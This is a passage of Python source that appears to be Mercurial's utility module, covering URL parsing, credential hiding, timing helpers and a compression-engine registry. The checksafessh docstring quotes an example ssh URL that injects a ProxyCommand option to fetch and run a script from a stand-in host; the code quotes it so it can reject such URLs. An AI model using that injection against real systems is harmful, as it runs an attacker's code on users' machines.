2640 2641 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2641 2642
2642 2643 Missing components are set to None. The only exception is
2643 2644 fragment, which is set to '' if present but empty.
2644 2645
2645 2646 If parsefragment is False, fragment is included in query. If
2646 2647 parsequery is False, query is included in path. If both are
2647 2648 False, both fragment and query are included in path.
2648 2649
2649 2650 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2650 2651
2651 2652 Note that for backward compatibility reasons, bundle URLs do not
2652 2653 take host names. That means 'bundle://../' has a path of '../'.
2653 2654
2654 2655 Examples:
2655 2656
2656 2657 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2657 2658 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2658 2659 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2659 2660 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2660 2661 >>> url(b'file:///home/joe/repo')
2661 2662 <url scheme: 'file', path: '/home/joe/repo'>
2662 2663 >>> url(b'file:///c:/temp/foo/')
2663 2664 <url scheme: 'file', path: 'c:/temp/foo/'>
2664 2665 >>> url(b'bundle:foo')
2665 2666 <url scheme: 'bundle', path: 'foo'>
2666 2667 >>> url(b'bundle://../foo')
2667 2668 <url scheme: 'bundle', path: '../foo'>
2668 2669 >>> url(br'c:\foo\bar')
2669 2670 <url path: 'c:\\foo\\bar'>
2670 2671 >>> url(br'\\blah\blah\blah')
2671 2672 <url path: '\\\\blah\\blah\\blah'>
2672 2673 >>> url(br'\\blah\blah\blah#baz')
2673 2674 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2674 2675 >>> url(br'file:///C:\users\me')
2675 2676 <url scheme: 'file', path: 'C:\\users\\me'>
2676 2677
2677 2678 Authentication credentials:
2678 2679
2679 2680 >>> url(b'ssh://joe:xyz@x/repo')
2680 2681 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2681 2682 >>> url(b'ssh://joe@x/repo')
2682 2683 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2683 2684
2684 2685 Query strings and fragments:
2685 2686
2686 2687 >>> url(b'http://host/a?b#c')
2687 2688 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2688 2689 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2689 2690 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2690 2691
2691 2692 Empty path:
2692 2693
2693 2694 >>> url(b'')
2694 2695 <url path: ''>
2695 2696 >>> url(b'#a')
2696 2697 <url path: '', fragment: 'a'>
2697 2698 >>> url(b'http://host/')
2698 2699 <url scheme: 'http', host: 'host', path: ''>
2699 2700 >>> url(b'http://host/#a')
2700 2701 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2701 2702
2702 2703 Only scheme:
2703 2704
2704 2705 >>> url(b'http:')
2705 2706 <url scheme: 'http'>
2706 2707 """
2707 2708
2708 2709 _safechars = "!~*'()+"
2709 2710 _safepchars = "/!~*'()+:\\"
2710 2711 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2711 2712
2712 2713 def __init__(self, path, parsequery=True, parsefragment=True):
2713 2714 # We slowly chomp away at path until we have only the path left
2714 2715 self.scheme = self.user = self.passwd = self.host = None
2715 2716 self.port = self.path = self.query = self.fragment = None
2716 2717 self._localpath = True
2717 2718 self._hostport = ''
2718 2719 self._origpath = path
2719 2720
2720 2721 if parsefragment and '#' in path:
2721 2722 path, self.fragment = path.split('#', 1)
2722 2723
2723 2724 # special case for Windows drive letters and UNC paths
2724 2725 if hasdriveletter(path) or path.startswith('\\\\'):
2725 2726 self.path = path
2726 2727 return
2727 2728
2728 2729 # For compatibility reasons, we can't handle bundle paths as
2729 2730 # normal URLS
2730 2731 if path.startswith('bundle:'):
2731 2732 self.scheme = 'bundle'
2732 2733 path = path[7:]
2733 2734 if path.startswith('//'):
2734 2735 path = path[2:]
2735 2736 self.path = path
2736 2737 return
2737 2738
2738 2739 if self._matchscheme(path):
2739 2740 parts = path.split(':', 1)
2740 2741 if parts[0]:
2741 2742 self.scheme, path = parts
2742 2743 self._localpath = False
2743 2744
2744 2745 if not path:
2745 2746 path = None
2746 2747 if self._localpath:
2747 2748 self.path = ''
2748 2749 return
2749 2750 else:
2750 2751 if self._localpath:
2751 2752 self.path = path
2752 2753 return
2753 2754
2754 2755 if parsequery and '?' in path:
2755 2756 path, self.query = path.split('?', 1)
2756 2757 if not path:
2757 2758 path = None
2758 2759 if not self.query:
2759 2760 self.query = None
2760 2761
2761 2762 # // is required to specify a host/authority
2762 2763 if path and path.startswith('//'):
2763 2764 parts = path[2:].split('/', 1)
2764 2765 if len(parts) > 1:
2765 2766 self.host, path = parts
2766 2767 else:
2767 2768 self.host = parts[0]
2768 2769 path = None
2769 2770 if not self.host:
2770 2771 self.host = None
2771 2772 # path of file:///d is /d
2772 2773 # path of file:///d:/ is d:/, not /d:/
2773 2774 if path and not hasdriveletter(path):
2774 2775 path = '/' + path
2775 2776
2776 2777 if self.host and '@' in self.host:
2777 2778 self.user, self.host = self.host.rsplit('@', 1)
2778 2779 if ':' in self.user:
2779 2780 self.user, self.passwd = self.user.split(':', 1)
2780 2781 if not self.host:
2781 2782 self.host = None
2782 2783
2783 2784 # Don't split on colons in IPv6 addresses without ports
2784 2785 if (self.host and ':' in self.host and
2785 2786 not (self.host.startswith('[') and self.host.endswith(']'))):
2786 2787 self._hostport = self.host
2787 2788 self.host, self.port = self.host.rsplit(':', 1)
2788 2789 if not self.host:
2789 2790 self.host = None
2790 2791
2791 2792 if (self.host and self.scheme == 'file' and
2792 2793 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2793 2794 raise error.Abort(_('file:// URLs can only refer to localhost'))
2794 2795
2795 2796 self.path = path
2796 2797
2797 2798 # leave the query string escaped
2798 2799 for a in ('user', 'passwd', 'host', 'port',
2799 2800 'path', 'fragment'):
2800 2801 v = getattr(self, a)
2801 2802 if v is not None:
2802 2803 setattr(self, a, urlreq.unquote(v))
2803 2804
2804 2805 @encoding.strmethod
2805 2806 def __repr__(self):
2806 2807 attrs = []
2807 2808 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2808 2809 'query', 'fragment'):
2809 2810 v = getattr(self, a)
2810 2811 if v is not None:
2811 2812 attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
2812 2813 return '<url %s>' % ', '.join(attrs)
2813 2814
2814 2815 def __bytes__(self):
2815 2816 r"""Join the URL's components back into a URL string.
2816 2817
2817 2818 Examples:
2818 2819
2819 2820 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2820 2821 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2821 2822 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2822 2823 'http://user:pw@host:80/?foo=bar&baz=42'
2823 2824 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2824 2825 'http://user:pw@host:80/?foo=bar%3dbaz'
2825 2826 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2826 2827 'ssh://user:pw@[::1]:2200//home/joe#'
2827 2828 >>> bytes(url(b'http://localhost:80//'))
2828 2829 'http://localhost:80//'
2829 2830 >>> bytes(url(b'http://localhost:80/'))
2830 2831 'http://localhost:80/'
2831 2832 >>> bytes(url(b'http://localhost:80'))
2832 2833 'http://localhost:80/'
2833 2834 >>> bytes(url(b'bundle:foo'))
2834 2835 'bundle:foo'
2835 2836 >>> bytes(url(b'bundle://../foo'))
2836 2837 'bundle:../foo'
2837 2838 >>> bytes(url(b'path'))
2838 2839 'path'
2839 2840 >>> bytes(url(b'file:///tmp/foo/bar'))
2840 2841 'file:///tmp/foo/bar'
2841 2842 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2842 2843 'file:///c:/tmp/foo/bar'
2843 2844 >>> print(url(br'bundle:foo\bar'))
2844 2845 bundle:foo\bar
2845 2846 >>> print(url(br'file:///D:\data\hg'))
2846 2847 file:///D:\data\hg
2847 2848 """
2848 2849 if self._localpath:
2849 2850 s = self.path
2850 2851 if self.scheme == 'bundle':
2851 2852 s = 'bundle:' + s
2852 2853 if self.fragment:
2853 2854 s += '#' + self.fragment
2854 2855 return s
2855 2856
2856 2857 s = self.scheme + ':'
2857 2858 if self.user or self.passwd or self.host:
2858 2859 s += '//'
2859 2860 elif self.scheme and (not self.path or self.path.startswith('/')
2860 2861 or hasdriveletter(self.path)):
2861 2862 s += '//'
2862 2863 if hasdriveletter(self.path):
2863 2864 s += '/'
2864 2865 if self.user:
2865 2866 s += urlreq.quote(self.user, safe=self._safechars)
2866 2867 if self.passwd:
2867 2868 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2868 2869 if self.user or self.passwd:
2869 2870 s += '@'
2870 2871 if self.host:
2871 2872 if not (self.host.startswith('[') and self.host.endswith(']')):
2872 2873 s += urlreq.quote(self.host)
2873 2874 else:
2874 2875 s += self.host
2875 2876 if self.port:
2876 2877 s += ':' + urlreq.quote(self.port)
2877 2878 if self.host:
2878 2879 s += '/'
2879 2880 if self.path:
2880 2881 # TODO: similar to the query string, we should not unescape the
2881 2882 # path when we store it, the path might contain '%2f' = '/',
2882 2883 # which we should *not* escape.
2883 2884 s += urlreq.quote(self.path, safe=self._safepchars)
2884 2885 if self.query:
2885 2886 # we store the query in escaped form.
2886 2887 s += '?' + self.query
2887 2888 if self.fragment is not None:
2888 2889 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2889 2890 return s
2890 2891
2891 2892 __str__ = encoding.strmethod(__bytes__)
2892 2893
2893 2894 def authinfo(self):
2894 2895 user, passwd = self.user, self.passwd
2895 2896 try:
2896 2897 self.user, self.passwd = None, None
2897 2898 s = bytes(self)
2898 2899 finally:
2899 2900 self.user, self.passwd = user, passwd
2900 2901 if not self.user:
2901 2902 return (s, None)
2902 2903 # authinfo[1] is passed to urllib2 password manager, and its
2903 2904 # URIs must not contain credentials. The host is passed in the
2904 2905 # URIs list because Python < 2.4.3 uses only that to search for
2905 2906 # a password.
2906 2907 return (s, (None, (s, self.host),
2907 2908 self.user, self.passwd or ''))
2908 2909
2909 2910 def isabs(self):
2910 2911 if self.scheme and self.scheme != 'file':
2911 2912 return True # remote URL
2912 2913 if hasdriveletter(self.path):
2913 2914 return True # absolute for our purposes - can't be joined()
2914 2915 if self.path.startswith(br'\\'):
2915 2916 return True # Windows UNC path
2916 2917 if self.path.startswith('/'):
2917 2918 return True # POSIX-style
2918 2919 return False
2919 2920
2920 2921 def localpath(self):
2921 2922 if self.scheme == 'file' or self.scheme == 'bundle':
2922 2923 path = self.path or '/'
2923 2924 # For Windows, we need to promote hosts containing drive
2924 2925 # letters to paths with drive letters.
2925 2926 if hasdriveletter(self._hostport):
2926 2927 path = self._hostport + '/' + self.path
2927 2928 elif (self.host is not None and self.path
2928 2929 and not hasdriveletter(path)):
2929 2930 path = '/' + path
2930 2931 return path
2931 2932 return self._origpath
2932 2933
2933 2934 def islocal(self):
2934 2935 '''whether localpath will return something that posixfile can open'''
2935 2936 return (not self.scheme or self.scheme == 'file'
2936 2937 or self.scheme == 'bundle')
2937 2938
2938 2939 def hasscheme(path):
2939 2940 return bool(url(path).scheme)
2940 2941
2941 2942 def hasdriveletter(path):
2942 2943 return path and path[1:2] == ':' and path[0:1].isalpha()
2943 2944
2944 2945 def urllocalpath(path):
2945 2946 return url(path, parsequery=False, parsefragment=False).localpath()
2946 2947
2947 2948 def checksafessh(path):
2948 2949 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2949 2950
2950 2951 This is a sanity check for ssh urls. ssh will parse the first item as
2951 2952 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2952 2953 Let's prevent these potentially exploited urls entirely and warn the
2953 2954 user.
2954 2955
2955 2956 Raises an error.Abort when the url is unsafe.
2956 2957 """
2957 2958 path = urlreq.unquote(path)
2958 2959 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2959 2960 raise error.Abort(_('potentially unsafe url: %r') %
2960 2961 (pycompat.bytestr(path),))
2961 2962
2962 2963 def hidepassword(u):
2963 2964 '''hide user credential in a url string'''
2964 2965 u = url(u)
2965 2966 if u.passwd:
2966 2967 u.passwd = '***'
2967 2968 return bytes(u)
2968 2969
2969 2970 def removeauth(u):
2970 2971 '''remove all authentication information from a url string'''
2971 2972 u = url(u)
2972 2973 u.user = u.passwd = None
2973 2974 return bytes(u)
2974 2975
2975 2976 timecount = unitcountfn(
2976 2977 (1, 1e3, _('%.0f s')),
2977 2978 (100, 1, _('%.1f s')),
2978 2979 (10, 1, _('%.2f s')),
2979 2980 (1, 1, _('%.3f s')),
2980 2981 (100, 0.001, _('%.1f ms')),
2981 2982 (10, 0.001, _('%.2f ms')),
2982 2983 (1, 0.001, _('%.3f ms')),
2983 2984 (100, 0.000001, _('%.1f us')),
2984 2985 (10, 0.000001, _('%.2f us')),
2985 2986 (1, 0.000001, _('%.3f us')),
2986 2987 (100, 0.000000001, _('%.1f ns')),
2987 2988 (10, 0.000000001, _('%.2f ns')),
2988 2989 (1, 0.000000001, _('%.3f ns')),
2989 2990 )
2990 2991
2991 2992 @attr.s
2992 2993 class timedcmstats(object):
2993 2994 """Stats information produced by the timedcm context manager on entering."""
2994 2995
2995 2996 # the starting value of the timer as a float (meaning and resolution are
2996 2997 # platform dependent, see util.timer)
2997 2998 start = attr.ib(default=attr.Factory(lambda: timer()))
2998 2999 # the number of seconds as a floating point value; starts at 0, updated when
2999 3000 # the context is exited.
3000 3001 elapsed = attr.ib(default=0)
3001 3002 # the number of nested timedcm context managers.
3002 3003 level = attr.ib(default=1)
3003 3004
3004 3005 def __bytes__(self):
3005 3006 return timecount(self.elapsed) if self.elapsed else '<unknown>'
3006 3007
3007 3008 __str__ = encoding.strmethod(__bytes__)
3008 3009
3009 3010 @contextlib.contextmanager
3010 3011 def timedcm(whencefmt, *whenceargs):
3011 3012 """A context manager that produces timing information for a given context.
3012 3013
3013 3014 On entering, a timedcmstats instance is produced.
3014 3015
3015 3016 This context manager is reentrant.
3016 3017
3017 3018 """
3018 3019 # track nested context managers
3019 3020 timedcm._nested += 1
3020 3021 timing_stats = timedcmstats(level=timedcm._nested)
3021 3022 try:
3022 3023 with tracing.log(whencefmt, *whenceargs):
3023 3024 yield timing_stats
3024 3025 finally:
3025 3026 timing_stats.elapsed = timer() - timing_stats.start
3026 3027 timedcm._nested -= 1
3027 3028
3028 3029 timedcm._nested = 0
3029 3030
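# Example (illustrative sketch; the callee is hypothetical): timing an
# arbitrary block of code.
#
#   with timedcm(b'query %s', b'heads') as stats:
#       do_expensive_work()
#   print(bytes(stats))   # e.g. '1.23 ms' once the block has exited
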
3030 3031 def timed(func):
3031 3032 '''Report the execution time of a function call to stderr.
3032 3033
3033 3034 During development, use as a decorator when you need to measure
3034 3035 the cost of a function, e.g. as follows:
3035 3036
3036 3037 @util.timed
3037 3038 def foo(a, b, c):
3038 3039 pass
3039 3040 '''
3040 3041
3041 3042 def wrapper(*args, **kwargs):
3042 3043 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3043 3044 result = func(*args, **kwargs)
3044 3045 stderr = procutil.stderr
3045 3046 stderr.write('%s%s: %s\n' % (
3046 3047 ' ' * time_stats.level * 2, pycompat.bytestr(func.__name__),
3047 3048 time_stats))
3048 3049 return result
3049 3050 return wrapper
3050 3051
3051 3052 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3052 3053 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3053 3054
3054 3055 def sizetoint(s):
3055 3056 '''Convert a space specifier to a byte count.
3056 3057
3057 3058 >>> sizetoint(b'30')
3058 3059 30
3059 3060 >>> sizetoint(b'2.2kb')
3060 3061 2252
3061 3062 >>> sizetoint(b'6M')
3062 3063 6291456
3063 3064 '''
3064 3065 t = s.strip().lower()
3065 3066 try:
3066 3067 for k, u in _sizeunits:
3067 3068 if t.endswith(k):
3068 3069 return int(float(t[:-len(k)]) * u)
3069 3070 return int(t)
3070 3071 except ValueError:
3071 3072 raise error.ParseError(_("couldn't parse size: %s") % s)
3072 3073
3073 3074 class hooks(object):
3074 3075 '''A collection of hook functions that can be used to extend a
3075 3076 function's behavior. Hooks are called in lexicographic order,
3076 3077 based on the names of their sources.'''
3077 3078
3078 3079 def __init__(self):
3079 3080 self._hooks = []
3080 3081
3081 3082 def add(self, source, hook):
3082 3083 self._hooks.append((source, hook))
3083 3084
3084 3085 def __call__(self, *args):
3085 3086 self._hooks.sort(key=lambda x: x[0])
3086 3087 results = []
3087 3088 for source, hook in self._hooks:
3088 3089 results.append(hook(*args))
3089 3090 return results
3090 3091
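# Example (illustrative): hooks run in lexicographic order of their source
# names, regardless of registration order.
#
#   h = hooks()
#   h.add(b'zext', lambda x: x + 1)
#   h.add(b'aext', lambda x: x * 2)
#   h(3)   # -> [6, 4]: b'aext' runs before b'zext'
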
3091 3092 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3092 3093 '''Yields lines for a nicely formatted stacktrace.
3093 3094 Skips the last 'skip' entries, then returns the last 'depth' entries.
3094 3095 Each file+linenumber is formatted according to fileline.
3095 3096 Each line is formatted according to line.
3096 3097 If line is None, it yields:
3097 3098 length of longest filepath+line number,
3098 3099 filepath+linenumber,
3099 3100 function
3100 3101
3101 3102 Not to be used in production code, but very convenient while developing.
3102 3103 '''
3103 3104 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3104 3105 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3105 3106 ][-depth:]
3106 3107 if entries:
3107 3108 fnmax = max(len(entry[0]) for entry in entries)
3108 3109 for fnln, func in entries:
3109 3110 if line is None:
3110 3111 yield (fnmax, fnln, func)
3111 3112 else:
3112 3113 yield line % (fnmax, fnln, func)
3113 3114
3114 3115 def debugstacktrace(msg='stacktrace', skip=0,
3115 3116 f=procutil.stderr, otherf=procutil.stdout, depth=0):
3116 3117 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3117 3118 Skips the 'skip' entries closest to the call, then shows 'depth' entries.
3118 3119 By default it will flush stdout first.
3119 3120 It can be used everywhere and intentionally does not require an ui object.
3120 3121 Not to be used in production code, but very convenient while developing.
3121 3122 '''
3122 3123 if otherf:
3123 3124 otherf.flush()
3124 3125 f.write('%s at:\n' % msg.rstrip())
3125 3126 for line in getstackframes(skip + 1, depth=depth):
3126 3127 f.write(line)
3127 3128 f.flush()
3128 3129
3129 3130 class dirs(object):
3130 3131 '''a multiset of directory names from a dirstate or manifest'''
3131 3132
3132 3133 def __init__(self, map, skip=None):
3133 3134 self._dirs = {}
3134 3135 addpath = self.addpath
3135 3136 if safehasattr(map, 'iteritems') and skip is not None:
3136 3137 for f, s in map.iteritems():
3137 3138 if s[0] != skip:
3138 3139 addpath(f)
3139 3140 else:
3140 3141 for f in map:
3141 3142 addpath(f)
3142 3143
3143 3144 def addpath(self, path):
3144 3145 dirs = self._dirs
3145 3146 for base in finddirs(path):
3146 3147 if base in dirs:
3147 3148 dirs[base] += 1
3148 3149 return
3149 3150 dirs[base] = 1
3150 3151
3151 3152 def delpath(self, path):
3152 3153 dirs = self._dirs
3153 3154 for base in finddirs(path):
3154 3155 if dirs[base] > 1:
3155 3156 dirs[base] -= 1
3156 3157 return
3157 3158 del dirs[base]
3158 3159
3159 3160 def __iter__(self):
3160 3161 return iter(self._dirs)
3161 3162
3162 3163 def __contains__(self, d):
3163 3164 return d in self._dirs
3164 3165
3165 3166 if safehasattr(parsers, 'dirs'):
3166 3167 dirs = parsers.dirs
3167 3168
3168 3169 def finddirs(path):
3169 3170 pos = path.rfind('/')
3170 3171 while pos != -1:
3171 3172 yield path[:pos]
3172 3173 pos = path.rfind('/', 0, pos)
3173 3174
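# Example (illustrative): finddirs yields ancestor directories from deepest
# to shallowest, excluding the path itself and the empty root.
#
#   list(finddirs(b'a/b/c'))   # -> [b'a/b', b'a']
#   list(finddirs(b'file'))    # -> []
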
3174 3175 # compression code
3175 3176
3176 3177 SERVERROLE = 'server'
3177 3178 CLIENTROLE = 'client'
3178 3179
3179 3180 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3180 3181 (u'name', u'serverpriority',
3181 3182 u'clientpriority'))
3182 3183
3183 3184 class compressormanager(object):
3184 3185 """Holds registrations of various compression engines.
3185 3186
3186 3187 This class essentially abstracts the differences between compression
3187 3188 engines to allow new compression formats to be added easily, possibly from
3188 3189 extensions.
3189 3190
3190 3191 Compressors are registered against the global instance by calling its
3191 3192 ``register()`` method.
3192 3193 """
3193 3194 def __init__(self):
3194 3195 self._engines = {}
3195 3196 # Bundle spec human name to engine name.
3196 3197 self._bundlenames = {}
3197 3198 # Internal bundle identifier to engine name.
3198 3199 self._bundletypes = {}
3199 3200 # Revlog header to engine name.
3200 3201 self._revlogheaders = {}
3201 3202 # Wire proto identifier to engine name.
3202 3203 self._wiretypes = {}
3203 3204
3204 3205 def __getitem__(self, key):
3205 3206 return self._engines[key]
3206 3207
3207 3208 def __contains__(self, key):
3208 3209 return key in self._engines
3209 3210
3210 3211 def __iter__(self):
3211 3212 return iter(self._engines.keys())
3212 3213
3213 3214 def register(self, engine):
3214 3215 """Register a compression engine with the manager.
3215 3216
3216 3217 The argument must be a ``compressionengine`` instance.
3217 3218 """
3218 3219 if not isinstance(engine, compressionengine):
3219 3220 raise ValueError(_('argument must be a compressionengine'))
3220 3221
3221 3222 name = engine.name()
3222 3223
3223 3224 if name in self._engines:
3224 3225 raise error.Abort(_('compression engine %s already registered') %
3225 3226 name)
3226 3227
3227 3228 bundleinfo = engine.bundletype()
3228 3229 if bundleinfo:
3229 3230 bundlename, bundletype = bundleinfo
3230 3231
3231 3232 if bundlename in self._bundlenames:
3232 3233 raise error.Abort(_('bundle name %s already registered') %
3233 3234 bundlename)
3234 3235 if bundletype in self._bundletypes:
3235 3236 raise error.Abort(_('bundle type %s already registered by %s') %
3236 3237 (bundletype, self._bundletypes[bundletype]))
3237 3238
3238 3239 # Only register an external-facing name if one was declared.
3239 3240 if bundlename:
3240 3241 self._bundlenames[bundlename] = name
3241 3242
3242 3243 self._bundletypes[bundletype] = name
3243 3244
3244 3245 wiresupport = engine.wireprotosupport()
3245 3246 if wiresupport:
3246 3247 wiretype = wiresupport.name
3247 3248 if wiretype in self._wiretypes:
3248 3249 raise error.Abort(_('wire protocol compression %s already '
3249 3250 'registered by %s') %
3250 3251 (wiretype, self._wiretypes[wiretype]))
3251 3252
3252 3253 self._wiretypes[wiretype] = name
3253 3254
3254 3255 revlogheader = engine.revlogheader()
3255 3256 if revlogheader and revlogheader in self._revlogheaders:
3256 3257 raise error.Abort(_('revlog header %s already registered by %s') %
3257 3258 (revlogheader, self._revlogheaders[revlogheader]))
3258 3259
3259 3260 if revlogheader:
3260 3261 self._revlogheaders[revlogheader] = name
3261 3262
3262 3263 self._engines[name] = engine
3263 3264
3264 3265 @property
3265 3266 def supportedbundlenames(self):
3266 3267 return set(self._bundlenames.keys())
3267 3268
3268 3269 @property
3269 3270 def supportedbundletypes(self):
3270 3271 return set(self._bundletypes.keys())
3271 3272
3272 3273 def forbundlename(self, bundlename):
3273 3274 """Obtain a compression engine registered to a bundle name.
3274 3275
3275 3276 Will raise KeyError if the bundle name isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundlenames[bundlename]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forbundletype(self, bundletype):
        """Obtain a compression engine registered to a bundle type.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundletypes[bundletype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def supportedwireengines(self, role, onlyavailable=True):
        """Obtain compression engines that support the wire protocol.

        Returns a list of engines in prioritized order, most desired first.

        If ``onlyavailable`` is set, filter out engines that can't be
        loaded.
        """
        assert role in (SERVERROLE, CLIENTROLE)

        attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'

        engines = [self._engines[e] for e in self._wiretypes.values()]
        if onlyavailable:
            engines = [e for e in engines if e.available()]

        def getkey(e):
            # Sort first by priority, highest first. In case of tie, sort
            # alphabetically. This is arbitrary, but ensures output is
            # stable.
            w = e.wireprotosupport()
            return -1 * getattr(w, attr), w.name

        return list(sorted(engines, key=getkey))

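    # Example (illustrative sketch) for supportedwireengines() above: a server
    # choosing what to advertise could iterate engines in priority order:
    #
    #   for e in compengines.supportedwireengines(SERVERROLE):
    #       advertise(e.wireprotosupport().name)
    #
    # where 'advertise' is a hypothetical helper, not part of this module.
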
    def forwiretype(self, wiretype):
        engine = self._engines[self._wiretypes[wiretype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forrevlogheader(self, header):
        """Obtain a compression engine registered to a revlog header.

        Will raise KeyError if the revlog header value isn't registered.
        """
        return self._engines[self._revlogheaders[header]]

compengines = compressormanager()
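
# Example (illustrative sketch): resolving an engine from the registry and
# round-tripping data through it. 'gzip' is the user-facing bundle spec name
# registered by the zlib engine defined later in this module.
#
#   engine = compengines.forbundlename('gzip')
#   compressed = ''.join(engine.compressstream(iter(['some data'])))
#   reader = engine.decompressorreader(bytesio(compressed))
#   assert reader.read(9) == 'some data'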

class compressionengine(object):
    """Base class for compression engines.

    Compression engines must implement the interface defined by this class.
    """
    def name(self):
        """Returns the name of the compression engine.

        This is the key the engine is registered under.

        This method must be implemented.
        """
        raise NotImplementedError()

    def available(self):
        """Whether the compression engine is available.

        The intent of this method is to allow optional compression engines
        that may not be available in all installations (such as engines relying
        on C extensions that may not be present).
        """
        return True

    def bundletype(self):
        """Describes bundle identifiers for this engine.

        If this compression engine isn't supported for bundles, returns None.

        If this engine can be used for bundles, returns a 2-tuple of strings of
        the user-facing "bundle spec" compression name and an internal
        identifier used to denote the compression format within bundles. To
        exclude the name from external usage, set the first element to ``None``.

        If bundle compression is supported, the class must also implement
        ``compressstream`` and ``decompressorreader``.

        The docstring of this method is used in the help system to tell users
        about this engine.
        """
        return None

    def wireprotosupport(self):
        """Declare support for this compression format on the wire protocol.

        If this compression engine isn't supported for compressing wire
        protocol payloads, returns None.

        Otherwise, returns ``compenginewireprotosupport`` with the following
        fields:

        * String format identifier
        * Integer priority for the server
        * Integer priority for the client

        The integer priorities are used to order the advertisement of format
        support by server and client. The highest integer is advertised
        first. Integers with non-positive values aren't advertised.

        The priority values are somewhat arbitrary and only used for default
        ordering. The relative order can be changed via config options.

        If wire protocol compression is supported, the class must also implement
        ``compressstream`` and ``decompressorreader``.
        """
        return None

    def revlogheader(self):
        """Header added to revlog chunks that identifies this engine.

        If this engine can be used to compress revlogs, this method should
        return the bytes used to identify chunks compressed with this engine.
        Else, the method should return ``None`` to indicate it does not
        participate in revlog compression.
        """
        return None

    def compressstream(self, it, opts=None):
        """Compress an iterator of chunks.

        The method receives an iterator (ideally a generator) of chunks of
        bytes to be compressed. It returns an iterator (ideally a generator)
        of chunks of bytes representing the compressed output.

        Optionally accepts an argument defining how to perform compression.
        Each engine treats this argument differently.
        """
        raise NotImplementedError()

    def decompressorreader(self, fh):
        """Perform decompression on a file object.

        Argument is an object with a ``read(size)`` method that returns
        compressed data. Return value is an object with a ``read(size)`` that
        returns uncompressed data.
        """
        raise NotImplementedError()

    def revlogcompressor(self, opts=None):
        """Obtain an object that can be used to compress revlog entries.

        The object has a ``compress(data)`` method that compresses binary
        data. This method returns compressed binary data or ``None`` if
        the data could not be compressed (too small, not compressible, etc).
        The returned data should have a header uniquely identifying this
        compression format so decompression can be routed to this engine.
        This header should be identified by the ``revlogheader()`` return
        value.

        The object has a ``decompress(data)`` method that decompresses
        data. The method will only be called if ``data`` begins with
        ``revlogheader()``. The method should return the raw, uncompressed
        data or raise a ``StorageError``.

        The object is reusable but is not thread safe.
        """
        raise NotImplementedError()

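# Example (illustrative sketch, not shipped with Mercurial): a minimal pass-
# through engine implementing the interface above. A real engine would also
# declare bundletype(), wireprotosupport() and/or revlogheader() to take part
# in those subsystems; the base class defaults opt out of all of them.
#
#   class _identityengine(compressionengine):
#       def name(self):
#           return 'identity'
#
#       def compressstream(self, it, opts=None):
#           return it
#
#       def decompressorreader(self, fh):
#           return fh
#
#   compengines.register(_identityengine())
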
class _CompressedStreamReader(object):
    def __init__(self, fh):
        if safehasattr(fh, 'unbufferedread'):
            self._reader = fh.unbufferedread
        else:
            self._reader = fh.read
        self._pending = []
        self._pos = 0
        self._eof = False

    def _decompress(self, chunk):
        raise NotImplementedError()

    def read(self, l):
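        # Invariants: _pending is a FIFO of decompressed chunks not yet
        # returned to the caller; _pos is the read offset into _pending[0];
        # _eof is set by _decompress() once the underlying compressed stream
        # is known to be exhausted.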
        buf = []
        while True:
            while self._pending:
                if len(self._pending[0]) > l + self._pos:
                    newbuf = self._pending[0]
                    buf.append(newbuf[self._pos:self._pos + l])
                    self._pos += l
                    return ''.join(buf)

                newbuf = self._pending.pop(0)
                if self._pos:
                    buf.append(newbuf[self._pos:])
                    l -= len(newbuf) - self._pos
                else:
                    buf.append(newbuf)
                    l -= len(newbuf)
                self._pos = 0

            if self._eof:
                return ''.join(buf)
            chunk = self._reader(65536)
            self._decompress(chunk)
            if not chunk and not self._pending and not self._eof:
                # No progress and no new data, bail out
                return ''.join(buf)

class _GzipCompressedStreamReader(_CompressedStreamReader):
    def __init__(self, fh):
        super(_GzipCompressedStreamReader, self).__init__(fh)
        self._decompobj = zlib.decompressobj()
    def _decompress(self, chunk):
